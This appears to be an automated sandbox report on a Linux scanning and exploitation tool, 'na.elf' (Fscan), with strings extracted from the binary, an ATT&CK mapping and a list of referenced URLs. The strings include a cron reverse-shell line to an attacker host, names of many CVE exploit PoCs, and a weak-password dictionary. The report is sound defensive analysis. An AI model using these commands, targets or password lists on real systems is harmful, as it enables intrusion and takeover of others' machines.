Source: na.elfBinary or memory string: alias value must contain alphanumerical characters onlybufio.Scanner: SplitFunc returns negative advance countcan't parse %q as a decimal number: precision too largecasfrom_Gscanstatus:top gp->status is not in scan statecipher.NewCBCDecrypter: IV length must equal block sizecipher.NewCBCEncrypter: IV length must equal block sizeeach colon-separated field must have at least one digitedwards25519: invalid SetBytesWithClamping input lengthextension number %d is already registered on message %vfederated authentication flag length should be 1: is %dfederated authentication is not supported by the servergentraceback callback cannot be used with non-zero skipindent may only be composed of space and tab charactersmap merge requires map or sequence of maps as the valuemheap.freeSpanLocked - invalid free of user arena chunknet/http: invalid byte %q in %s; dropping invalid bytesnet/http: request canceled while waiting for connectionos: invalid use of WriteAt on file opened with O_APPENDpb.Merge() arguments must be the same type. got: %v, %vpocs/apache-ofbiz-cve-2020-9496-xml-deserialization.ymlpocs/vmware-vcenter-unauthorized-rce-cve-2021-21972.ymlreflect.FuncOf: last arg of variadic func must be slicereflect: internal error: invalid use of makeMethodValueset xx "\n* * * * * bash -i >& /dev/tcp/%v/%v 0>&1\n"
Source: na.elfBinary or memory string: fdw_invalid_string_length_or_buffer_lengthhome agent address discovery reply messagehttp: ContentLength=%d with Body length %dhttp: multipart handled by MultipartReaderinsufficient data for resource body lengthinvalid array: want %d elements but got %dinvalid size of transaction identifier: %dinvalid_argument_for_width_bucket_functionlooking for beginning of object key stringmismatch between ABI description and typesmismatched input '$1' expecting IDENTIFIERmix of request and response pseudo headersmssql: invalid type for Guid column: %T %smssql: invalid type for date column: %T %smssql: invalid type for time column: %T %sno_additional_dynamic_result_sets_returnednon-empty mark queue after concurrent markon a locked thread with no template threadout of memory allocating checkmarks bitmappersistentalloc: align is not a power of 2pocs/citrix-cve-2020-8193-unauthorized.ymlpocs/e-zkeco-cnvd-2020-57264-read-file.ymlpocs/finereport-v8-arbitrary-file-read.ymlpocs/fortigate-cve-2018-13379-readfile.ymlpocs/jellyfin-file-read-cve-2021-21402.ymlpocs/ruijie-nbr1300g-cli-password-leak.ymlpocs/sangfor-edr-arbitrary-admin-login.ymlpocs/vmware-vcenter-cve-2021-21985-rce.ymlpocs/wordpress-cve-2019-19985-infoleak.ymlpocs/wordpress-ext-adaptive-images-lfi.ymlpoly1305: write to MAC after Sum or Verifyquotedprintable: invalid bytes after =: %qreflect: Call with too few input argumentsreflect: cannot convert slice with length reflect: negative length passed to ArrayOfruntime: blocked write on closing polldescsql: unknown driver %q (forgotten import?)ssh: public key does not match private keysweep: tried to preserve a user arena spansync/atomic: store of nil value into Valuetls: RSA signing requires a RSA public keytls: private key does not match public keytransaction_integrity_constraint_violationtype '%s' does not support field selectiontype conversion on iterators not supportedunexpected end of braced value at index %dunexpected signal during runtime executionunsupported field selection target: (%T)%vx509: %q cannot be encoded as an IA5Stringx509: RSA modulus is not a positive number{EXCEPTION} Floating-point inexact result.{EXCEPTION} Multiple floating-point traps.!!binary value contains invalid base64 data%s: signs of seconds and nanos do not match(
Source: na.elfBinary or memory string: att_rcavx512base64bigintbinarybuffercallerchan<-closedcookiedbnamediscuzdoAuthdomaindoubledpanicefenceempty equalserrno error:exec: existsexpectfilterfolderglobalgopherhanguphash: headerimportin_mapinternip+netjstypekilledkrbspnlistenloggermembermethodminutendots:netdnsnumberobjectoffsetoptKeyoracleoriginpackedpopcntpq: %sproto2proto3qwe123rdrandrdseedrdtscpreadatremoverenameretValreturnrune1 scalarsecondseeyonselectsendtoserversilentsint32sint64size_tsmb2: socketsocks socks5splicesrvsvcsshkeysslkeystatfsstatusstderrstringstructsubstrsweep switchsyntaxsysmonsystemtelnettimersto_dyntoken(tongdauint16uint32uint64updatevarintvmwarewaitidweaverwebpocyaml: zabbix{user}
Source: na.elfBinary or memory string: name: poc-yaml-vmware-vcenter-unauthorized-rce-cve-2021-21972
Source: na.elfBinary or memory string: name: poc-yaml-vmware-vcenter-cve-2021-21985-rce
Source: na.elfBinary or memory string: vulnpath: "/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData"

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: na.elfesets: ResetSession
Source: na.elfesets: resetSession
Source: na.elfavast: GetJavaStringCheckUtf8
Source: na.elfavast: JavaStringCheckUtf8{protobuf:"varint,27,opt,name=java_string_check_utf8,json=javaStringCheckUtf8,def=0" json:"java_string_check_utf8,omitempty"
Source: na.elfyunsuo: .local.onion.proto/proc/0000000x%04x111111123123123321123456123qwe1q2w3e390625654321666666<-chan<<%T>>@itemsAES128AES192AES256Aa1234AcceptAnswerArabicAugustBIGINTBINARYBPCHARBasic BrahmiCANCELCEL.g4CIRCLECOMMITCWD %sCarianCausesChakmaCommonComodoCookieCopticCustomDELETEDES40CDES56CDOUBLEDPANICEQUALSEXCLAMExpectExpireFETCH FLOAT4FLOAT8FieldsFormatFridayGOAWAYGOROOTGitLabGoTypeGothicHIDDENHangulHarborHatranHebrewHyphenINSERTIgnoreIsListIsWeakIsraelJEECMSKaithiKhojkiLBRACELETTERLPARENLengthLepchaLockedLycianLydianMKD %sMapKeyMinTTLMondayNagiosNavajoNumberOPAQUEOneofsOpen :OutputPADDEDPBSZ 0PG_LSNPROT PPolandPragmaPrime:Proto2Proto3Proxy:RBRACERC4_40RC4_56RECORDRMD %sRPARENRejangResultRow %dSCHED SELECTSHA256SHA384SHA512STREETSTRINGSerialServerStatusStringSucuriSundaySyntaxSyriacTDdateTIMETZTMPDIRTai_LeTangutTargetTeluguThaanaTurkeyTypeMXTypeNSUINT64UPDATEUTF-16VARBITValuesWanchoWeightX25519YezidiYundunYunsuo[INFO][WARN][]byte\ufffd
Source: na.elfsafedog: %s:*:%v%s://%s%s=%s; %sError'false'(JBoss)(ns_af))(HOST=)(PORT=)(USER=, goid=, j0 = , type=,errno=.0.0/16.000000.pgpass0.0.0.01-655351000001100000210000031000004100000519531252.0.0.02.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.93DES1123DES16888888889765625: type ::ffff::method:scheme:status<<nil>><input>@valuesABSTIMEACLITEMANYENUMAPPE %sAa1234.Aa12345AvestanBengaliBrailleCOMMENTCONNECTCST6CDTCSTRINGChanDirConnectConvertCreatedCypriotDECIMALDECLAREDELE %sDELETE DISABLEDefaultDenyAllDeseretERROR: ESC_SEQEST5EDTEd25519ElbasanElymaicError: Etc/GMTEtc/UCTEtc/UTCExecuteExpiresFloats:GB-EireGB18030GODEBUGGREATERGranthaHEADERSHanunooILLEGALIM UsedINSERT IO waitIcelandImportsInstAltInstNopJamaicaJanuaryJenkinsJiasuleKannadaLaravelMACADDRMD2-RSAMD5-RSAMDTM %sMST7MDTMakasarMandaicMarchenMessageMethodsMultaniMyanmarNUMERICNUM_INTNZ-CHATOctoberOsmanyaPASS %sPERCENTPG_PROCPG_TYPEPOLYGONPST8PDTPackageRC4_128RC4_256REGOPERREGPROCREGROLEREGTYPERELTIMEREST %dRETR %sRETRY: RNFR %sRNTO %sRadicalRefererRefreshRequestSELECT SHA-224SHA-256SHA-384SHA-512SIZE %sSTOR %sSafedogSharadaShavianSiddhamSignal SinhalaSogdianSoyomboStruts2SubjectSwapperTABLOCKTINYINTTRIGGERTSQUERYTSRANGETagalogTibetanTirhutaTrailerTuesdayTypeALLTypeOPTTypePTRTypeSOATypeSRVTypeTXTTypeWKSTypechoUNKNOWNUPDATE USER %sUnknownUnpack:UpgradeUsage:
Source: na.elfyunsuo: Usp-SecVARCHARVarnishVerboseWallarm[DEBUG][ERROR]\\%s\%s@%s%vtypes value=_BPCHAR_CIRCLE_FLOAT4_FLOAT8_PG_LSN_RECORD_TIMETZ_VARBITa123123a123456abortedaccept4action_addressalt -> answersany -> arcfouravx512fbdoUxXvbooleancharsetchtimeschunkedclosurecomplexconnStrconnectconsolecpuprofcs defaultderiveddisableencryptepsilonexpiresexploitfindnetfixed32fixed64float32float64forcegcfs gbk_bingctracegetDategs head = headershp8_binhttp://ignoredin_listintegerinvalidjeesitelandrayliterallookup map keymatchesmessageminpc= mongodbms17010mssql: netbiosnil keyno portno_datanocolornop -> noredisnumber optionsosxsavepacer: packagepanic: pass123pocnamepocpathpopModeprimaryproblemproto: r10 r11 r12 r13 r14 r15 r8 r9 rax rbp rbx rcx rdi rdx read %sreaddirrecvmsgrefererrefreshrequestreverserflags rip rsi rsp runningsendmsgserial:servicesessionsignal sizeof=ssh-dssssh-rsasshtypesslcertsslmodestoppedsuccesssymlinksyscalltest123timeouttinyinttrailerueditoruintptrunknownupgradeurlfileuser idwaitingwarningwebonlywmiexecwriteatwwwrootxxl-jobyongyou{user}1 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= ping=%q pointer stack=[ start: status !!binary!QAZ2wsx%!Month(%d to %d%s.%s.%s%s:%d:%v');die('(360wzb)(AM8000)(YUNDUN)(webvpn)(yunsuo)) errno=, LT(1)=, MBox: , Port: , input=/gid_map/uid_map/vendor/0000000000:00:0001234567123456!a12345678123456~a15:04:051qaz!QAZ1qaz2wsx1qaz@WSX2.5.4.102.5.4.112.5.4.172006-1-22wsx@WSX3des-cbc48828125>=prec}?@hasNextANYARRAYANYRANGEAUTH TLSAUTH_PIDAUTH_SIDAa123123Aa12345.Aa123456AcceptedArmenianBAD RANKBalineseBlockDoSBoolKindBopomofoBugineseCEL_TRUECherokeeClassANYConflictContinueCurveID(CyrillicDATETIMEDNS nameDOWNGRD
Source: na.elfyunsuo: Usp-SecVARCHARVarnishVerboseWallarm[DEBUG][ERROR]\\%s\%s@%s%vtypes value=_BPCHAR_CIRCLE_FLOAT4_FLOAT8_PG_LSN_RECORD_TIMETZ_VARBITa123123a123456abortedaccept4action_addressalt -> answersany -> arcfouravx512fbdoUxXvbooleancharsetchtimeschunkedclosurecomplexconnStrconnectconsolecpuprofcs defaultderiveddisableencryptepsilonexpiresexploitfindnetfixed32fixed64float32float64forcegcfs gbk_bingctracegetDategs head = headershp8_binhttp://ignoredin_listintegerinvalidjeesitelandrayliterallookup map keymatchesmessageminpc= mongodbms17010mssql: netbiosnil keyno portno_datanocolornop -> noredisnumber optionsosxsavepacer: packagepanic: pass123pocnamepocpathpopModeprimaryproblemproto: r10 r11 r12 r13 r14 r15 r8 r9 rax rbp rbx rcx rdi rdx read %sreaddirrecvmsgrefererrefreshrequestreverserflags rip rsi rsp runningsendmsgserial:servicesessionsignal sizeof=ssh-dssssh-rsasshtypesslcertsslmodestoppedsuccesssymlinksyscalltest123timeouttinyinttrailerueditoruintptrunknownupgradeurlfileuser idwaitingwarningwebonlywmiexecwriteatwwwrootxxl-jobyongyou{user}1 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= ping=%q pointer stack=[ start: status !!binary!QAZ2wsx%!Month(%d to %d%s.%s.%s%s:%d:%v');die('(360wzb)(AM8000)(YUNDUN)(webvpn)(yunsuo)) errno=, LT(1)=, MBox: , Port: , input=/gid_map/uid_map/vendor/0000000000:00:0001234567123456!a12345678123456~a15:04:051qaz!QAZ1qaz2wsx1qaz@WSX2.5.4.102.5.4.112.5.4.172006-1-22wsx@WSX3des-cbc48828125>=prec}?@hasNextANYARRAYANYRANGEAUTH TLSAUTH_PIDAUTH_SIDAa123123Aa12345.Aa123456AcceptedArmenianBAD RANKBalineseBlockDoSBoolKindBopomofoBugineseCEL_TRUECherokeeClassANYConflictContinueCurveID(CyrillicDATETIMEDNS nameDOWNGRDDOWNGRD
Source: na.elfesets: Huawei SMCIDEMPOTENTIDENTIFIERINSERTBULKINT2VECTORIP addressIsMapEntryKEEP_NULLSKeep-AliveKharoshthiKubernetesLOGICAL_ORLob Size: MDTM %s %sMEDIUMBLOBMEDIUMTEXTMFMT %s %sManichaeanMessage-IdNOT_EQUALSNULL_VALUENo ContentNot HasherOld_ItalicOld_PermicOld_TurkicOther_MathOutputfilePGPASSFILEPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingRIPEMD-160RST_STREAMSET NAMES SHA256-RSASHA384-RSASHA512-RSASMALLMONEYSaurashtraSet-CookieSint32KindSint64KindSpring envStringKindSwagger UISyntax(%d)TYPE_BYTESTYPE_FLOATTYPE_GROUPTYPE_INT32TYPE_INT64Time stampTopsec-WafUNKNOWN_%dUS/ArizonaUS/CentralUS/EasternUS/PacificUint32KindUint64KindUnknownX%XUser-AgentUser-agentWHITESPACE[ DEBUG ] [-] Redis [:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]^\[(\d*)\]_DATERANGE_GTSVECTOR_INT4RANGE_INT8RANGE_OIDVECTOR_REFCURSOR_REGCONFIG_TIMESTAMP_TINTERVAL_TSTZRANGE__result__add_doubleadd_stringadd_uint64aes128-cbcaes128-ctraes192-ctraes256-ctrarcfour128arcfour256atomicand8avx512bf16avx512gfniavx512ifmaavx512vaesavx512vbmiavx512vnnibinary(%d)bytes_sizecomplex128connectioncp1250_bincp1251_bincp1256_bincp1257_bincreatetempdebug calldecode: %sdependencydeprecatedecho replyeval pred execerrdotexists_oneexp masterext-info-cextInfoMsgfinereportfloat32nanfloat64nangb2312_bingetMinutesgetSecondsgetsockoptgo-mssqldbgo_packagegoroutine hebrew_binhost errorhttp_proxyhttps://%simage/avifimage/jpegimage/webpimpossibleindex_listinput_typeinvalid IPinvalidptrkeep-alivekexInitMsgkrbsrvnamelatin1_binlatin2_binlatin5_binlatin7_binless_bytesless_int64logical_ormSpanInUsemacKey128:md5_stringmultipart-netlinkribnewReversenot_equalsnotifyListon successon update:oneof_declowner diedp_err_codep_nls_compp_nls_sortphpMyAdminplaintext:postgresqlprofInsertpubkey=%+vquery ID: read sign:readdirentres binderres masterresult.txtresumptionrow[%d] %srune <nil>runtime: gs.state = scan errorschedtracesemacquiresessionid:set-cookiesetsockoptshort readsize_bytesskipping: smallmoneysmb domainsocks bindstackLargestacktracestart pingstartsWithstream endswagger_uit.Kind == terminatedtis620_bintpkt Writetracefree(tracegc()
Source: na.elfsafedog: GSiS has invalid name spinningthreads=%%!%c(big.Int=%s)%s: %v is not set(Safedog|WAF/2.0)(Spark Master at)(Spark Worker at)(X-CDN|Incapsula)(get_dkey_passwd)(laravel_session)(powered by h5ai)(service@h3c.com), 0, {interval: {, p.searchAddr = ,conflictingAlts=/etc/ssl/cert.pem01-02-06 03:04PM0123456789ABCDEFX0123456789abcdefx060102150405Z0700119209289550781252006-01-02 15:0459604644775390625: missing method ; SameSite=StrictAUTH_SC_DB_DOMAINAfrica/CasablancaAfrica/LibrevilleAfrica/LubumbashiAfrica/NouakchottAfrica/Porto-NovoAmerica/AnchorageAmerica/AraguainaAmerica/Boa_VistaAmerica/CatamarcaAmerica/ChihuahuaAmerica/FortalezaAmerica/Glace_BayAmerica/Goose_BayAmerica/GuatemalaAmerica/GuayaquilAmerica/MenomineeAmerica/Sao_PauloAmerica/St_ThomasAmerica/VancouverAntarctica/MawsonAntarctica/PalmerAsia/Kuala_LumpurBegin transactionCHECK_CONSTRAINTSCOMPRESSION_ERRORChile/ContinentalConnection ClosedContainingMessageDecodeDERTRequestDirectory status.DomainControllersENHANCE_YOUR_CALMEurope/BratislavaEurope/CopenhagenEurope/LuxembourgEurope/San_MarinoEurope/SimferopolEurope/ZaporozhyeFALLING off rule Failed DependencyFile unavailable.GC assist markingHEADER_TABLE_SIZEHTTP_1_1_REQUIREDIf-Modified-SinceInvalid ParameterIsStreamingClientIsStreamingServerMessenger ServiceMoved PermanentlyNetBiosDomainNameOld_North_ArabianOld_South_ArabianOpen %s error, %vOther_ID_ContinuePGCONNECT_TIMEOUTPROXY CLIENT NAMEPROXY_CLIENT_NAMEPacific/EnderburyPacific/GalapagosPacific/KwajaleinPacific/MarquesasPacific/Pago_PagoPacific/RarotongaPacific/TongatapuSIGBUS: bus errorSIGCONT: continueSIGINT: interruptSTART TRANSACTIONSentence_TerminalTELEPORT
Source: na.elfesets: state type %d is invalidstreamSafe was not resetstructure needs cleaningtag:yaml.org,2002:binarytext/html; charset=utf-8timestamp_to_day_of_weektimestamp_to_day_of_yearunable to resolve %s: %vunable to resolve %v: %qunexpected ReadyForQueryunexpected buffer len=%vunknown channel type: %vunknown cipher algorithmunpacking Question.Classunsupported constant: %vunsupported ptr bits: %duntranslatable_characterupdate during transitionusing: %s ..... [FAILED]utf8_general_mysql500_ciwhile scanning an anchorx509: malformed validity
Source: na.elfesets: fdw_invalid_use_of_null_pointerfield %v contains invalid UTF-8fmt: unknown base; can't happenfound duplicate %YAML directiveframe_headers_prio_weight_shortgoogle.protobuf.FieldMask.pathshttp2: connection error: %v: %vin literal null (expecting 'l')in literal null (expecting 'u')in literal true (expecting 'e')in literal true (expecting 'r')in literal true (expecting 'u')incomplete UTF-8 octet sequenceinternal error - misuse of itabinvalid Go type %v for field %vinvalid argument to has() macroinvalid connection protocol: %sinvalid_savepoint_specificationinvalid_transaction_terminationinvalid_use_of_escape_characterjson: invalid number literal %qmalformed time zone informationmergeRuneSets odd length []runenet/http: TLS handshake timeoutno viable alternative at input no_standard_descriptor_accessornon in-use span in unswept listoracle.security.client.passwordoracle.security.client.usernamepacer: sweep done at heap size pattern contains path separatorpoc full scan,as: shiro 100 keypocs/activemq-cve-2016-3088.ymlpocs/couchcms-cve-2018-7662.ymlpocs/couchdb-cve-2017-12635.ymlpocs/dedecms-guestbook-sqli.ymlpocs/gateone-cve-2020-35736.ymlpocs/minio-default-password.ymlpocs/nexus-default-password.ymlpocs/qilin-bastion-host-rce.ymlpocs/rconfig-cve-2019-16663.ymlpocs/resin-cnnvd-200705-315.ymlpocs/seacms-before-v992-rce.ymlpocs/seeyon-a6-test-jsp-sql.ymlpocs/shopxo-cnvd-2021-15822.ymlpocs/thinkadmin-v6-readfile.ymlpocs/thinkphp-v6-file-write.ymlpocs/weblogic-cve-2019-2725.ymlreference to undefined type: %sreflect.MakeSlice: negative capreflect.MakeSlice: negative lenreflect: Len of non-array type reflect: NumIn of non-func typeremote error: handshake failureresetspinning: not a spinning mruntime: cannot allocate memoryruntime: split stack overflow: slice bounds out of range [%x:]slice bounds out of range [:%x]sotypeToNet unknown socket typesql: duplicate driverConn closessh: DH parameter out of boundsssh: elliptic.Unmarshal failuressh: max packet length exceededssh: remote side wrote too muchssh: unhandled elliptic curve: ssh: unsupported ecdsa key sizetime: missing unit in duration timestamp (%v) after 9999-12-31tls: ECDSA verification failuretls: failed to sign handshake: tls: no certificates configuredtls: unsupported public key: %Ttoo many authentication methodstoo many transfer encodings: %qtpkt recvExtendedFastPathHeadertriggered_data_change_violationunexpected Describe response %qunknown or missing protocol: %sunknown token type returned: %vunsafe.String: len out of rangeunsupported well-known type: %vuuid: cannot convert %T to UUIDuuid: incorrect UUID format: %suuid: incorrect UUID length: %swhile scanning a %TAG directivex509: certificate is valid for x509: malformed GeneralizedTimex509: malformed subjectUniqueIDx509: malformed tbs certificatezone must be a non-empty string
Source: na.elfesets: %vanchor '%s' value contains itselfapplication/x-www-form-urlencodedbase outside usable address spacebranch_transaction_already_activebroken cipher context data formatbroken query info response formatbytes.Buffer.Grow: negative countbytes.Reader.Seek: invalid whencecolumn count mismatch n:%d len:%dconcurrent map read and map writeconnection not allowed by rulesetcould not format value for %v: %vcouldn't parse pem in sslrootcertcrypto/aes: output not full blockcrypto/des: output not full blockcrypto: requested hash function #dnsmessage.SRVResource{Priority: dnsmessage.UnknownResource{Type: ed25519: bad private key length: encoding: missing byte order markexpected nothing after STREAM-ENDexpected type '%s' but found '%s'failed to get Kerberos ticket: %qfdw_invalid_data_type_descriptorsfindrunnable: negative nmspinningframe_pushpromise_promiseid_shortfreeing stack not in a stack spango package net: confVal.netCgo = go-ora: column %d require type %vhttp2: invalid pseudo headers: %vhttp: CloseIdleConnections calledhttp: invalid Read on closed Bodyindefinite length found (not DER)invalid DATETIME packet length %dinvalid SetUnknown on nil Messageinvalid header field value for %qinvalid username/password versioninvalid value %q for flag -%s: %vinvalid_indicator_parameter_valueinvalid_row_count_in_limit_clauseis not allowed to connect to thisleafCounts[maxBits][maxBits] != nlocal file '%s' is not registeredmin must be a non-zero power of 2misrounded allocation in sysAllocmissing character after backslashnet/http: skip alternate protocolno encoder registered for name %qno support for proto1 MessageSetsno support for proto1 weak fieldsnull_value_no_indicator_parameterpad size larger than data payloadpocs/citrix-cve-2020-8191-xss.ymlpocs/confluence-cve-2015-8399.ymlpocs/coremail-cnvd-2019-16798.ymlpocs/dedecms-membergroup-sqli.ymlpocs/dlink-cve-2019-16920-rce.ymlpocs/drupal-cve-2018-7600-rce.ymlpocs/flexpaper-cve-2018-11686.ymlpocs/jenkins-cve-2018-1000600.ymlpocs/joomla-cve-2018-7314-sql.ymlpocs/saltstack-cve-2020-16846.ymlpocs/showdoc-default-password.ymlpocs/thinkphp5-controller-rce.ymlpocs/tongda-insert-sql-inject.ymlpocs/vbulletin-cve-2019-16759.ymlpocs/weaver-ebridge-file-read.ymlpocs/weblogic-cve-2019-2729-1.ymlpocs/weblogic-cve-2019-2729-2.ymlpocs/zimbra-cve-2019-9670-xxe.ymlpseudo header field after regularreflect.Value.Equal: invalid Kindreflect.nameFrom: name too long: reflect: Field index out of rangereflect: NumOut of non-func type reflect: array index out of rangereflect: chanDir of non-chan typereflect: slice index out of rangeregexp: unhandled case in compilersa-sha2-256-cert-v01@openssh.comrsa-sha2-512-cert-v01@openssh.comruntime: castogscanstatus oldval=runtime: epollcreate failed with runtime: failed mSpanList.insert runtime: goroutine stack exceeds runtime: memory allocated by OS [runtime: name offset out of rangeruntime: text offset out of rangeruntime: type offset out of rangescalar has high bit set illegallysequence_generator_limit_ex
Source: na.elfesets: span set block with unpopped elements found in resetsql: Tx.Stmt: statement from different database usedssh: peer's curve25519 public value has wrong lengthssh: unexpected message type %d (expected one of %v)tls: private key type does not match public key typetls: received a session ticket with invalid lifetimetls: server selected unsupported protocol version %xunexpected packet type in reply: got %v, expected %vuser and password not allowed with file URLs: got %vx509: cannot verify signature: insecure algorithm %v{Device Offline} The printer has been taken offline.{End of Media} The end of the media was encountered.(/index.php/mail/auth/processlogin|Powered by Atmail)(/wp-login.php?action=lostpassword|WordPress</title>)(LangChao.ECGAP.OutPortal|OnlineQuery/QueryList.aspx)A directory service resource limit has been exceeded.A floating point overflow occurred at the RPC server.A global group cannot have a local group as a member.A group marked "use for deny only" cannot be enabled.A null context handle is passed as an [in] parameter.A write operation failed while converting the volume.An IKE policy cannot contain an Extended Mode policy.Indicates that the specified image is already loaded.Monitor descriptor contains invalid manufacture date.NODE_RDP_PROTOCOL_T125_GCC_BAD_OBJECT_IDENTIFIER_T124Reissue the given operation as a cached I/O operationTTC error: received code %d during simple object readThe GUID allocation server is disabled at the moment.The KDC reply contained more than one principal name.The Plug and Play query operation was not successful.The WMI data item or data block could not be changed.The binding to the network interface is being closed.The client certificate account mapping is not unique.The manifest file contains one or more syntax errors.The object path component was not a directory object.The remote network is not reachable by the transport.The remote storage service encountered a media error.The size of the manifest exceeds the maximum allowed.The specified VidPN is active and cannot be accessed.The specified interrupt vector was already connected.The specified monitor frequency range set is invalid.The supplied variant structure contains invalid data.Unicode (UTF 16 LE) specified, but uneven data length[]sql.NullTime parameter need time.Time or nil values^[-+]?(\.[0-9]+|[0-9]+(\.[0-9]*)?)([eE][-+]?[0-9]+)?$advanced negotiation error: bad parameter from serverbufio.Scan: too many empty tokens without progressingchacha20: internal error: wrong dst and/or src lengthcrypto/ecdh: internal error: mismatched isLess inputscrypto/elliptic: attempted operation on invalid pointdid not find expected alphabetic or numeric characterdid not get cancellation confirmation from the servererror in reading wallet: object ID: %s is not presenterror: stage: %s call_id %d status: %s error code: %xgo-ora: TimeStamp column type require time.Time valuego-ora: argument in scan should be passed as pointershttp2: Framer %p: failed to decode just-writ
Source: na.elfesets: runtime.resetspinning
Source: na.elfesets: regexp.mergeRuneSets
Source: na.elfesets: regexp.mergeRuneSets.func2
Source: na.elfesets: regexp.mergeRuneSets.func1
Source: na.elfesets: database/sql.(*driverConn).resetSession
Source: na.elfesets: database/sql.(*driverConn).resetSession.func1
Source: na.elfesets: github.com/denisenkom/go-mssqldb.(*Conn).ResetSession
Source: na.elfesets: github.com/go-sql-driver/mysql.(*mysqlConn).ResetSession
Source: na.elfesets: github.com/antlr/antlr4/runtime/Go/antlr.resetSimState
Source: na.elfavast: google.golang.org/protobuf/types/descriptorpb.(*FileOptions).GetJavaStringCheckUtf8
Source: na.elfesets: net/http.(*http2clientConnReadLoop).processResetStream
Source: na.elfesets: go.uber.org/zap.resetSinkRegistry
Source: na.elfesets: go.uber.org/zap.resetSinkRegistry.func1
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Systemd Service
1
Systemd Service
1
Disable or Modify Tools
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory1
System Information Discovery
Remote Desktop ProtocolData from Removable Media1
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532417 Sample: na.elf Startdate: 13/10/2024 Architecture: LINUX Score: 21 13 daisy.ubuntu.com 2->13 15 Sample contains AV-related strings 2->15 7 systemd snap-failure 2->7         started        signatures3 process4 process5 9 snap-failure systemctl 7->9         started        11 snap-failure 7->11         started       
SourceDetectionScannerLabelLink
na.elf5%ReversingLabsLinux.PUA.Fscan
No Antivirus matches
SourceDetectionScannerLabelLink
daisy.ubuntu.com0%VirustotalBrowse
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
daisy.ubuntu.com
162.213.35.24
truefalseunknown
NameSourceMaliciousAntivirus DetectionReputation
https://mp.weixin.qq.com/s/XEnjVwb9I0GPG9RG-v7lHQname:na.elffalse
    unknown
    https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.htmlna.elffalse
      unknown
      https://docs.min.io/cn/na.elffalse
        unknown
        http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.7%20auth_mobi.php%20%na.elffalse
          unknown
          https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019na.elffalse
            unknown
            https://github.com/jweny)na.elffalse
              unknown
              https://www.seebug.org/vuldb/ssvid-97265na.elffalse
                unknown
                https://www.seebug.org/vuldb/ssvid-97267na.elffalse
                  unknown
                  https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635na.elffalse
                    unknown
                    https://nvd.nist.gov/vuln/detail/CVE-2020-27986na.elffalse
                      unknown
                      https://www.seebug.org/vuldb/ssvid-97266na.elffalse
                        unknown
                        https://github.com/jas502n/CVE-2019-6340na.elffalse
                          unknown
                          https://www.oracle.com/security-alerts/alert-cve-2020-14750.htmlna.elffalse
                            unknown
                            https://www.seebug.org/vuldb/ssvid-97268na.elffalse
                              unknown
                              https://github.com/JrDw0/)na.elffalse
                                unknown
                                https://blog.csdn.net/fnmsd/article/details/88657083na.elffalse
                                  unknown
                                  https://www.cnvd.org.cn/flaw/show/CNVD-2021-34568na.elffalse
                                    unknown
                                    https://github.com/2357000166)na.elffalse
                                      unknown
                                      https://github.com/whami-root)na.elffalse
                                        unknown
                                        https://github.com/neverendxxxxxx)na.elffalse
                                          unknown
                                          https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.htmlna.elffalse
                                            unknown
                                            https://s.tencent.com/research/bsafe/1228.htmlna.elffalse
                                              unknown
                                              https://github.com/Print1n)na.elffalse
                                                unknown
                                                https://www.zabbix.com/documentation/3.4/zh/manual/quickstart/loginna.elffalse
                                                  unknown
                                                  https://yun.scdsjzx.cn/system/notice/detail/399d2dd0-94aa-4914-a8f6-e71f8dc8ac87na.elffalse
                                                    unknown
                                                    http://www.wujunjie.net/index.php/2015/08/02/%E6%96%B9%E7%BB%B4%E5%9B%A2%E8%B4%AD4-3%E6%9C%80%E6%96%na.elffalse
                                                      unknown
                                                      https://yq.aliyun.com/articles/616757na.elffalse
                                                        unknown
                                                        https://github.com/PR3R00T/CVE-2020-8193-Citrix-Scanner/blob/master/scanner.pyna.elffalse
                                                          unknown
                                                          https://github.com/Sup3rm4nx0x)na.elffalse
                                                            unknown
                                                            https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlwna.elffalse
                                                              unknown
                                                              https://github.com/CouchCMS/CouchCMS/issues/46na.elffalse
                                                                unknown
                                                                https://github.com/kzaopa)na.elffalse
                                                                  unknown
                                                                  https://www.ohlinge.cn)na.elffalse
                                                                    unknown
                                                                    https://blog.csdn.net/dfdhxb995397/article/details/101385340na.elffalse
                                                                      unknown
                                                                      https://hub.docker.com/r/petergrace/opentsdb-dockerna.elffalse
                                                                        unknown
                                                                        https://cert.360.cn/warning/detail?id=fba518d5fc5c4ed4ebedff1dab24caf2na.elffalse
                                                                          unknown
                                                                          https://blog.csdn.net/zy15667076526/article/details/111413979na.elffalse
                                                                            unknown
                                                                            http://wx.weaver)(na.elffalse
                                                                              unknown
                                                                              https://www.twilio.com/blog/2017/08/http-requests-in-node-js.htmlname:na.elffalse
                                                                                unknown
